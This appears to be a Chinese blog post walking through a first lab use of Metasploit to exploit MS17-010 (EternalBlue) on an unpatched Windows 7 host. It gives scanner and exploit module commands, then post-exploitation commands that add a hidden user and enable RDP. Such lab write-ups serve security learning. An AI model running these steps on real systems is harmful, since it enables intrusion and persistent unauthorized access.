2019-9-27:渗透测试,metasploit-framework初接触

时间:2023-03-09 18:40:24
2019-9-27:渗透测试,metasploit-framework初接触

初次利用metasploit漏洞利用框架,入侵获取win7获取权限

目标机系统:windows7,无修复补丁

目标ip地址:192.168.20.131

任务:利用ms17-010,永恒之蓝漏洞,获取目标系统控制权

1,使用metasploit前,需要开启Postgresql数据库,输入命令service Postgresql start开启服务

2019-9-27:渗透测试,metasploit-framework初接触

2,输入命令msfconsole,启动metasploit,终端界面出现msf5就是启动完成

2019-9-27:渗透测试,metasploit-framework初接触

3,首先确定利用插件目录,输入命令search ms17-010,确定扫描插件目录以便使用

2019-9-27:渗透测试,metasploit-framework初接触

可以看到,

auxiliary/scanner/smb/smb_ms17_010, 这个是扫描ms17-010确定是否有该漏洞的脚本所在目录

exploit/windows/smb/ms17_010_eternalblue ,这个是漏洞利用脚本所在目录

4,利用目录都确定之后,开始正式使用,输入use auxiliary/scanner/smb/smb_ms17_010 ,进入扫描目录

2019-9-27:渗透测试,metasploit-framework初接触

5,进入扫描目录之后,可以show options,查看扫描所需要设置的参数

2019-9-27:渗透测试,metasploit-framework初接触

6,设置参数,输入命令,set rhosts 192.168.20.131,确定扫描主机

2019-9-27:渗透测试,metasploit-framework初接触

7,输入exploit,确定目标主机存在可利用漏洞

2019-9-27:渗透测试,metasploit-framework初接触

8,既然确定可以利用了,那就不客气的搞起了,输入use exploit/windows/smb/ms17_010_eternalblue,进入ms17-010漏洞利用脚本下,set rhosts 192.168.20.131,设置好攻击主机

2019-9-27:渗透测试,metasploit-framework初接触

9,运行exploit,启动攻击,成功拿下,并直接获取了system权限

2019-9-27:渗透测试,metasploit-framework初接触

2019-9-27:渗透测试,metasploit-framework初接触

10,拿下shell之后,当然可以为所欲为,

net user $用户名  /add, 添加一个隐藏用户

net user $用户名 密码,设置隐藏用户的密码

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,开启3389端口

11,总结

metasploit-framework不愧是做网络渗透测试的必备工具,提供了非常多的常用漏洞利用脚本方便测试人员使用,极大的节省了测试人员时间,是极好的,渗透测试人员要务必精通